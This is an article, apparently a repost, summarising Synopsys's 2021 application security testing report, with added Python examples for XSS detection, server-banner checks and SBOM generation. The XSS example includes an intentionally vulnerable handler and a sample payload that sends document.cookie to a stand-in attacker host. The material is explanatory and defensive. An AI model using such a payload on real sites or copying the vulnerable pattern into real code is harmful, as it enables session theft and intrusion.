In the digital economy, software is the main way most enterprises interact with customers and provide customer support. If the software an enterprise sells, or a product containing its embedded software, has security, compliance or quality problems that affect how the product is used, the impact on the enterprise can be severe. Even enterprises that do not directly sell software or software-driven products are affected by software quality and security problems: most payroll, billing, accounts receivable, sales tracking and customer record systems are software-driven, and software controls production, manages inventory, directs warehousing and runs the distribution systems that keep the business operating. Understanding of software security and application security testing therefore needs to be more comprehensive.
Synopsys, Inc. (Nasdaq: SNPS) recently released the report "2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services" (hereinafter "the report"). The report analyzes data from 3,900 tests performed in 2020 on 2,600 targets (software or systems). The data comes from tests that Synopsys security consultants conducted for customers in its assessment centers, including penetration testing, dynamic application security testing (DAST) and mobile application security analysis, which exercise running applications while simulating real-world attacker behavior.
Of the targets tested, 83% were web applications, 12% were mobile applications, and the remainder were source code or network systems/applications. Industries covered include software and internet, financial services, business services, manufacturing, media and entertainment, and healthcare.
Girish Janardhanudu, vice president of security consulting in the Synopsys Software Integrity Group, said: "Cloud-based deployments, modern technology frameworks and fast delivery speeds are forcing security teams to respond faster. Because AppSec resources are in short supply on the market, enterprises are using the application security testing services provided by Synopsys in order to flexibly scale their security testing. We have seen demand for security assessments increase significantly during the pandemic."
Across the 3,900 tests, 97% of targets were found to have some form of vulnerability; 30% of targets had high-risk vulnerabilities and 6% had critical-risk vulnerabilities. The results show that the best security-testing practice is to use the full range of available tools and techniques to help ensure an application or system is free of vulnerabilities, since no single tool finds everything. For example, 28% of test targets were exposed to cross-site scripting (XSS), one of the most common and destructive high/critical-risk vulnerability classes affecting web applications. Many XSS vulnerabilities only appear when the application is running, so they are found by exercising the running application rather than by reading code alone.
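As an added illustration of why XSS is a run-time finding (this is example code written for this article, not code from the report or from Synopsys), the following Python shows a hypothetical search handler that reflects a query parameter into HTML, the same handler with contextual output encoding, and the kind of canary probe a dynamic scanner sends to detect unencoded reflection. The handler names, the payload and the hostname `attacker.example` are all constructed for the example.

```python
import html
from urllib.parse import parse_qs, quote

# Constructed sample request for a search page that echoes the query back.
# The payload and the hostname are illustrative only.
SAMPLE_QUERY = (
    'q=<script>document.location="https://attacker.example/?c="'
    '%2Bdocument.cookie</script>'
)


def _param(query_string: str, name: str = "q") -> str:
    """Return the first value of a query-string parameter, URL-decoded."""
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Hypothetical handler that concatenates raw input into an HTML text node.
    This is the reflected-XSS pattern a DAST scanner finds at run time."""
    return f"<p>Results for: {_param(query_string)}</p>"


def render_hardened(query_string: str) -> str:
    """Same handler with contextual output encoding (HTML entity escaping).
    Escaping is for an HTML text node; attribute or JS contexts need their own encoder."""
    return f"<p>Results for: {html.escape(_param(query_string), quote=True)}</p>"


# A harmless canary, the way a dynamic scanner probes for reflection: if the
# marker comes back byte-for-byte, the output context is unencoded.
CANARY = "<svg/onload=alert(1)>"


def reflected_unencoded(handler, name: str = "q") -> bool:
    """Send the canary through the running handler and look for it unencoded."""
    page = handler(f"{name}={quote(CANARY)}")
    return CANARY in page


def contains_script_tag(page: str) -> bool:
    """Crude check used by the tests below: did a <script> tag survive into the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for h in (render_vulnerable, render_hardened):
        print(h.__name__, "reflects canary unencoded:", reflected_unencoded(h))
```

The probe only works against the running handler: static reading of `render_vulnerable` would also spot the concatenation, but in a real framework the sink is usually buried in a template, which is why the report sees many XSS findings only from dynamic testing.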

Other highlights of the report :
• 76% of the tested targets had at least one vulnerability from the 2021 OWASP Top 10.
Application and server misconfigurations accounted for 21% of all vulnerabilities found in the tests, corresponding to the OWASP A05:2021 – Security Misconfiguration category. In addition, 19% of the vulnerabilities found fall under OWASP A01:2021 – Broken Access Control.
• Insecure data storage and communication vulnerabilities plague mobile applications.
Of the vulnerabilities found in mobile testing, 80% related to insecure data storage. Such vulnerabilities give an attacker with physical access (for example to a stolen device), or with malware running on the device, a way to read the stored data. A further 53% of the vulnerabilities found in mobile testing related to insecure communication.
• Even low-risk vulnerabilities can be exploited to facilitate attacks.
64% of the vulnerabilities found in testing were rated minimal, low or medium risk, meaning an attacker cannot directly exploit them to gain access to the system or to sensitive data. Finding them is still worthwhile, because even low-risk vulnerabilities can be chained into an attack. For example, 49% of test targets returned server banners that disclose the server name, type and version number, information that helps an attacker mount targeted attacks against a specific technology stack.
• The urgent need for a software bill of materials.
Notably, penetration tests by Synopsys application security testing services found that 18% of systems were using vulnerable third-party libraries, consistent with the 2021 OWASP Top 10 category A06:2021 – Vulnerable and Outdated Components. Most organizations build software for external sale or internal use from a mix of proprietary code, commercial off-the-shelf code and open source components. Usually these enterprises keep only an informal inventory, or no inventory at all, of which components their software uses and of the license, version and patch status of each. Because many enterprises run hundreds of applications or software systems, they may depend on hundreds to thousands of different third-party and open source components, so an accurate and up-to-date software bill of materials (SBOM) is urgently needed to track them effectively.
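The server-banner finding above is a low-risk disclosure that a tester rates by whether a version number is present. The following Python is an added example (not code from the report or from Synopsys) that parses raw HTTP response header blocks, reports the fingerprinting headers present, and rates them the way the passage describes. The three responses, the host labels and the header list are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample responses, as a scanner would capture the raw header block.
SAMPLE_RESPONSES = {
    "host-a": (
        "HTTP/1.1 200 OK\r\n"
        "Server: Apache/2.4.29 (Ubuntu)\r\n"
        "X-Powered-By: PHP/7.2.24\r\n"
        "Content-Type: text/html\r\n\r\n"
    ),
    "host-b": "HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n\r\n",
    "host-c": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
}

# Headers commonly used for fingerprinting; the list is illustrative, not exhaustive.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")
VERSION_RE = re.compile(r"\d+\.\d+(?:\.\d+)?")


def parse_headers(raw: str) -> Dict[str, str]:
    """Parse the header block of a raw HTTP response into a lower-cased dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def banner_findings(raw: str) -> List[dict]:
    """One finding per fingerprinting header present, flagging a version string."""
    headers = parse_headers(raw)
    return [
        {
            "header": h,
            "value": headers[h],
            "version_disclosed": bool(VERSION_RE.search(headers[h])),
        }
        for h in DISCLOSURE_HEADERS
        if h in headers
    ]


def severity(findings: List[dict]) -> str:
    """Rate as the report does: a product name alone is informational, a version
    number lets an attacker target a specific stack and is a low-risk finding."""
    if not findings:
        return "none"
    return "low" if any(f["version_disclosed"] for f in findings) else "info"


def scan(responses: Dict[str, str]) -> Dict[str, str]:
    """Rate every captured response by host label."""
    return {host: severity(banner_findings(raw)) for host, raw in responses.items()}


if __name__ == "__main__":
    for host, raw in SAMPLE_RESPONSES.items():
        print(host, severity(banner_findings(raw)), banner_findings(raw))
```

The fix on the server side is configuration, not code: `ServerTokens Prod` and `ServerSignature Off` in Apache httpd, `server_tokens off;` in nginx, and `expose_php = Off` in php.ini remove the version (and, for PHP, the whole `X-Powered-By` header) without affecting functionality.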
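To show what the SBOM in the last bullet looks like in practice, the following Python is an added example (not code from the report or from Synopsys) that turns a pinned dependency manifest into a minimal CycloneDX 1.4 JSON document and then matches its components against an advisory feed. The manifest, the package names (`libfoo`, `libbar`, `libbaz`, `libqux`) and the advisory entries with `EXAMPLE-` identifiers are all constructed and fictitious; the version comparison is a simplified numeric tuple compare, where real tooling would use a full version-specifier parser.

```python
import json
from typing import Dict, List, Tuple

# Constructed manifest in requirements.txt style; package names are fictitious.
MANIFEST = """\
# web layer
libfoo==1.2.3
libbar==0.9.0   # pinned for compatibility
libbaz==2.0.1
"""

# Constructed advisory feed (placeholder ids, not real advisories):
# package -> first version that carries the fix.
ADVISORIES = {
    "libbar": {"id": "EXAMPLE-0001", "fixed_in": "0.9.2"},
    "libqux": {"id": "EXAMPLE-0002", "fixed_in": "3.0.0"},  # not in the manifest
}


def parse_manifest(text: str) -> List[Tuple[str, str]]:
    """Return (name, version) pairs from pinned 'name==version' lines.
    Unpinned lines are rejected: an SBOM needs exact versions to be useful."""
    pins = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, version = line.partition("==")
        if not version:
            raise ValueError(f"unpinned dependency: {line!r}")
        pins.append((name.strip().lower(), version.strip()))
    return pins


def build_sbom(pins: List[Tuple[str, str]]) -> dict:
    """Minimal CycloneDX 1.4 JSON document with a package URL per component."""
    return {
        "bomFormat": "CycloneDX",
        "specVersion": "1.4",
        "version": 1,
        "components": [
            {"type": "library", "name": n, "version": v, "purl": f"pkg:pypi/{n}@{v}"}
            for n, v in pins
        ],
    }


def _vtuple(v: str) -> Tuple[int, ...]:
    """Simplified version key: dotted integers only (no pre-release handling)."""
    return tuple(int(p) for p in v.split("."))


def affected_components(sbom: dict, feed: Dict[str, dict]) -> List[dict]:
    """Components whose version is below the advisory's fixed_in version."""
    hits = []
    for c in sbom["components"]:
        adv = feed.get(c["name"])
        if adv and _vtuple(c["version"]) < _vtuple(adv["fixed_in"]):
            hits.append(
                {
                    "name": c["name"],
                    "version": c["version"],
                    "advisory": adv["id"],
                    "fixed_in": adv["fixed_in"],
                }
            )
    return hits


if __name__ == "__main__":
    sbom = build_sbom(parse_manifest(MANIFEST))
    print(json.dumps(sbom, indent=2))
    print(affected_components(sbom, ADVISORIES))
```

The point of the exercise is the second half: once components and versions are recorded in a machine-readable form, checking them against an advisory feed is a loop, and re-running it after each feed update is what keeps the 18% figure from the report from growing silently.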
Original copyright notice
This article was created by InfoQ; please include a link to the original when reposting.
https://yzsam.com/2022/03/202203011503042217.html